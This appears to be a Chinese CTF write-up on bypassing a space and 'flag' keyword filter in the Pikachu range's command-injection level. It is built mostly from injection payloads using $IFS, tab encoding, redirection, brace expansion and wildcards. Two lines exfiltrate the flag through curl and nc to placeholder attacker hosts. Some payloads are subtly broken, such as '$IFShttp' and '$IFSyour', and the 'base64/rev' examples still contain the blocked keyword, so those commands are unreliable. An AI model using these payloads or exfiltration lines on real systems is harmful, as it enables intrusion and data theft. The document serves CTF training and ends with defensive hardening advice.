CTF靶场实战:绕过Pikachu Level7的WAF过滤(空格与flag关键词)的5种Shell技巧
CTF靶场实战:绕过Pikachu Level7的WAF过滤(空格与flag关键词)的5种Shell技巧
在CTF靶场挑战中,Web应用防火墙(WAF)的规则往往成为解题的关键障碍。Pikachu靶场的Level7关卡设计了一个典型的命令注入场景,通过preg_match("/flag| /", $cmd)过滤了空格和"flag"关键词。这种限制看似简单,却考验着选手对Shell特性的深入理解。本文将系统梳理5种绕过技巧,从基础到进阶,帮助你在实战中灵活应对类似限制。
1. 理解WAF过滤机制与解题思路
任何有效的绕过都始于对防御机制的理解。Level7的WAF采用正则表达式匹配,直接拦截包含空格或"flag"字符串的输入。这种设计模拟了现实中简单的黑名单过滤策略,其核心漏洞在于:
- 单一维度的检测:仅检查原始输入,未考虑命令解析后的效果
- 缺乏上下文感知:无法识别经过编码或特殊处理的等效操作
- Shell特性盲区:未覆盖所有可能的命令分隔方式
绕过这类限制需要掌握两个核心技巧:
- 命令分隔替代方案:用非空格字符实现参数分割
- 关键词变形技术:改变"flag"的呈现形式而不影响最终解析
提示:在实际CTF比赛中,建议先用
?cmd=echo test测试基础RCE漏洞,确认存在命令注入后再尝试绕过WAF。
2. 五种实战绕过技巧详解
2.1 使用$IFS替代空格
$IFS(Internal Field Separator)是Shell中的内置变量,默认包含空格、制表符和换行符。当WAF过滤空格时,可以直接使用$IFS作为替代:
?cmd=cat$IFS/fla?技术细节:
$IFS在Bash中默认为<space><tab><newline>- 无需引号包裹,直接拼接即可保持变量解析
- 适用于大多数Linux系统环境
变体技巧:
?cmd=cat${IFS}/fla? # 使用花括号明确变量边界 ?cmd=cat$'\t'/fla? # 使用ANSI-C引用的制表符2.2 利用%09(URL编码制表符)
当输入经过URL解码时,可以使用制表符的URL编码%09替代空格:
?cmd=cat%09/fla?工作原理:
- 服务器接收到
%09后解码为ASCII 9(水平制表符) - Shell将制表符解释为参数分隔符
- 最终等效于
cat /fla?
注意事项:
- 仅适用于输入经过URL解码的场景
- 某些WAF可能会检测
%09等特殊编码 - 可尝试组合其他空白符编码(如
%0a换行符)
2.3 重定向输入绕过
通过输入重定向可以完全避免在命令中直接出现文件路径:
?cmd=cat</fl"ag技术要点:
<将文件内容重定向到命令的标准输入- 使用引号分割"flag"关键词(此处用双引号)
- Shell在解析时会自动合并相邻字符串
进阶用法:
?cmd=cat<./fl'ag' ?cmd=cat<fl\ag2.4 花括号扩展技巧
Bash的花括号扩展功能可以创造性地构造命令:
?cmd={cat,/f'l'ag}语法解析:
- 花括号内用逗号分隔的列表会展开为多个参数
- 单引号包裹部分字符可避免关键词检测
- 最终解析为
cat和/flag两个参数
扩展应用:
?cmd=/b?n/cat${IFS}/fla* ?cmd=ca''t$IFS/fl''ag2.5 通配符与路径拼接
利用Shell的通配符特性实现模糊匹配:
?cmd=cat$IFS/fl*匹配规则:
*匹配任意数量字符?匹配单个字符- 适用于已知文件位置但名称被过滤的情况
组合技巧:
?cmd=cat$IFS/??? # 匹配3字符文件名 ?cmd=cat$IFS/*ag* # 匹配包含"ag"的文件3. 防御视角的加固建议
理解攻击手法后,从开发者角度应考虑以下防护措施:
| 防护策略 | 实现方式 | 有效性 |
|---|---|---|
| 输入白名单 | 只允许字母数字 | ★★★★★ |
| 命令限制 | 禁用特殊字符($,{},<>) | ★★★★☆ |
| 上下文感知 | 检测最终执行的命令 | ★★★☆☆ |
| 沙箱环境 | 在隔离环境中执行命令 | ★★★★★ |
关键原则:
- 避免使用黑名单过滤(永远会有遗漏)
- 使用参数化查询或严格的白名单
- 最小权限原则运行Web服务
4. 实战演练与调试技巧
遇到WAF限制时,建议采用以下调试流程:
基础测试:确认命令注入点
?cmd=echo$IFS'test'逐步绕过:从简单到复杂尝试各种技巧
# 测试空格绕过 ?cmd=ls$IFS/ # 测试关键词过滤 ?cmd=echo$IFS'fla'组合验证:叠加多种绕过技术
?cmd=ca\t$IFS/fl''ag结果获取:当直接输出被屏蔽时,尝试:
?cmd=curl$IFShttp://your-server/$(cat$IFS/flag)
5. 扩展思考与变种挑战
Level7的解题思路可以延伸应用到其他场景:
关键词变形进阶:
?cmd=base64$IFS/flag # 输出编码结果 ?cmd=rev$IFS/flag # 反转文本绕过检测多级过滤绕过: 当遇到多层过滤时,可以组合使用:
?cmd={cat,/fl""ag}|{base64,-d}无回显场景处理: 参考Level8的技巧,通过重定向或外部通信获取结果:
?cmd=cat$IFS/flag|nc$IFSyour-ip$IFSport
在真实渗透测试中,这些技术需要根据具体环境调整。我曾在一个实际案例中发现,通过${PATH:0:1}可以动态生成斜杠字符(/),完全避开了路径字符串的静态检测。这种创造性思维正是CTF训练的核心价值所在。